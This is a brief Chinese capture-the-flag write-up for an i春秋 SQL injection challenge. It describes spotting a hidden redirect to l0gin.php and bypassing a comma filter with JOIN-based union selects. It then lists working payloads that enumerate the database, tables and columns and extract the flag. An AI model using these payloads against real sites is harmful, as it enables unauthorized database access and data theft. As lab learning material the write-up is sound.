------------恢复内容开始------------
题目名称:i春秋sqli
访问题目地址 f12得到以下这个页面
http://cb85ab94aeb24909987d3dea872d8e0974c47dc1c73a4c8b.changame.ichunqiu.com/login.php?id=1
成功进入 掏出sqlmap 扫
没扫出注入点啊
抓一下这个包 发送到repeater
注意一下follow redirection 默认不跟随重定向,如果跟随重定向,点击follow redirection就会跳转到重定向的页面中去
发现了l0gin.php?id=1 出题人想瞒天过海
进入到了一个新页面
发现过滤了逗号之后的内容
逗号绕过:
使用join:
union select 1,2 #等价于
union select * from (select 1)a join (select 2)b
具体见 https://www.cnblogs.com/Vinson404/p/7253255.html
用url编码%23或者-- -绕过#
?id=0' union select * from (select database())a join (select 2)b -- -
?id=0' union select * from (select group_concat(TABLE_NAME) from information_schema.tables where table_schema='sqli')a join (select 2)b -- -
?id=0' union select * from (select group_concat(COLUMN_NAME) from information_schema.columns where table_name='users')a join (select 2)b -- -
?id=0' union select * from (select group_concat(flag_9c861b688330) from sqli.users)a join (select 2)b -- -